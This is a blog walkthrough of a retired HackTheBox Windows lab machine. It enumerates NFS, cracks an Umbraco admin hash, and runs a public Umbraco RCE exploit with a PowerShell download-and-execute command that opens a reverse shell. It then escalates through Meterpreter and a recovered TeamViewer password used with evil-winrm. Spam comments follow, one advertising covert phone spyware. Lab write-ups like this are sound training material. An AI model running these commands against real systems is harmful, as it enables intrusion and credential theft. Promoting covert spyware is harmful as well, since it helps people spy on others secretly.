Remote machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan

Full Port Scan

As a result of port scanning, we found that 21/tcp ftp Microsoft ftpd (Anonymous FTP login allowed), 80/tcp http Microsoft HTTPAPI httpd 2.0, 111/tcp rpcbind, 111/tcp6 rpcbind, 135/tcp msrpc Microsoft Windows RPC, 139/tcp netbios-ssn Microsoft Windows netbios-ssn, 445/tcp microsoft-ds, 2049/tcp mountd ports are open.
We provide enumeration over these ports in order
FTP is open and allows anonymous access. I connected, but the root is empty. I also tested writing but no permission.
Typical checks on SMB showed no access to any share:
NFS enumeration
NFS is very rare on HTB machines and so having it turned on is definitely worth some attention. showmount will give the paths that can be mounted and who can mount them.

showmount -e
mount -t nfs /tmp/nfs

We mount it to the tmp/nfs folder using the commands. Then we provide enumeration here. Here we looked at all folders
We saw the credentail information in the App_Data/Umbraco.sdf file.
.sdf files are standard database format files

Credential information is hashed, let’s try to break it
and try to crack the hash.

I broke hashi with John
appeared as baconandcheese
After that we go to the enumeration section on port 80.

We came across Umbraco HQ, this ready-made CMS, let’s do a gobuster scan on it

Here we encountered directories, when we went to the /umbraco directory, it directed us to the login page, where we use the credential information we obtained.
admin@htb.local : baconandcheese

We were able to successfully log in

We provide enumeration through the interface

Let’s see if there is a vulnerability with this version

We encountered a lot of vulnerabilities here.
RCE vulnerabilities are always important for us, we download this and run it
As seen here

Command executed we ran whoami and got the command output. We understand that there is a vulnerability here.
Here we send Invoke-PowerShellTcp.ps1 to the other side and run it
python 49488.py -u admin@htb.local -p baconandcheese -i -c ‘cmd.exe’ -a “/c powershell -c iex(new-object net.webclient).downloadstring(‘’)”

In 1 we offer web service from python so that in 2 we work our command and in 3 we get shelli
We obtained the user flag from the Shell we obtained, but we could not obtain the root flag

Since we got permission denied, we provide local enumeration here.
We used commands such as systeminfo whoami /priv and then we displayed the running likes with tasklist

We see that TeamViewer_Service.exe is running. Let’s check which version of Teamviwer is running and then search for exploits related to it

We saw that it was Version 7

We ran the code on github but I couldn’t decode it

After a little more research, I realized that it also exists on metasploit, here we will have to use msfconsole, first let’s get msfvenom to generate a revershell for us, then install it on this malicious machine and listen with multi handler on msfconsole.

Then we digip and set Show options from msfconsole

We say run and wait and go and upload the payload we created to the target machine.

After running it we got shell from meterreter
Now let’s search for teamviwer

We ran the password genrete we found
We obtained the password !R3m0te! We try this from the admin user
evil-winrm -i -u administrator -p ‘!R3m0te!’

This is how we got the root flag.


  1. Shaylene

    Hi there! This post couldn’t be written any
    better! Going through this article reminds
    me of my previous roommate! He always kept talking about
    this. I am going to send this post to him. Fairly certain he’ll
    have a good read. I appreciate you for sharing!

  2. Alen

    Heya! I just wanted to ask if you ever have any issues with hackers?

    My last blog (wordpress) was hacked and I ended up losing many months of hard
    work due to no data backup. Do you have any solutions to prevent hackers?

  3. Sacheen

    I simply could not depart your web site before suggesting that I extremely enjoyed the standard information a person provide to your guests?
    Is going to be back ceaselessly in order to check up on new posts

  4. Jamika

    Its such as you read my thoughts! You appear to grasp
    so much about this, like you wrote the book in it or something.

    I feel that you just can do with a few percent to
    force the message house a little bit, but instead of that, this is wonderful blog.
    An excellent read. I’ll definitely be back.

  5. Laney

    I’m excited to find this website. I wanted to thank you for your time
    just for this wonderful read!! I definitely savored every bit of it and I have you bookmarked to see new stuff on your blog.

  6. Cathlin

    Great beat ! I would like to apprentice at the same time as you amend your website, how can i subscribe for a blog website?
    The account helped me a appropriate deal. I had been a little bit familiar of this your broadcast provided vivid transparent idea

  7. sklep internetowy

    hello there and thank you for your information – I have
    definitely picked up anything new from right here.
    I did however expertise several technical issues using
    this site, since I experienced to reload the website lots of times previous
    to I could get it to load properly. I had been wondering if your web hosting is OK?
    Not that I’m complaining, but sluggish loading instances times will very frequently affect your placement in google and could damage your
    high quality score if advertising and marketing with Adwords.
    Well I am adding this RSS to my email and can look out for a
    lot more of your respective intriguing content. Make sure you update this again soon.
    I saw similar here: Sklep

  8. Rastrear Teléfono Celular

    Cuando tenga dudas sobre las actividades de sus hijos o la seguridad de sus padres, puede piratear sus teléfonos Android desde su computadora o dispositivo móvil para garantizar su seguridad. Nadie puede monitorear las 24 horas del día, pero existe un software espía profesional que puede monitorear en secreto las actividades de los teléfonos Android sin avisarles.

  9. Gsa Verified List

    Howdy! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my
    blog to rank for some targeted keywords but I’m not seeing very good
    success. If you know of any please share. Many thanks!
    You can read similar text here: AA List

  10. Margit Sroka

    Aw, this was a really nice post. In thought I would like to put in writing like this moreover – taking time and actual effort to make an excellent article… but what can I say… I procrastinate alot and in no way seem to get something done.

  11. uWeed

    Hiya, I’m really glad I’ve found this information. Nowadays bloggers publish just about gossips and internet and this is really irritating. A good web site with interesting content, that’s what I need. Thanks for keeping this web site, I’ll be visiting it. Do you do newsletters? Can’t find it.

  12. renew reviews

    Youre so cool! I dont suppose Ive learn something like this before. So good to find someone with some unique ideas on this subject. realy thank you for beginning this up. this web site is something that’s needed on the internet, someone with a bit originality. helpful job for bringing something new to the internet!

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir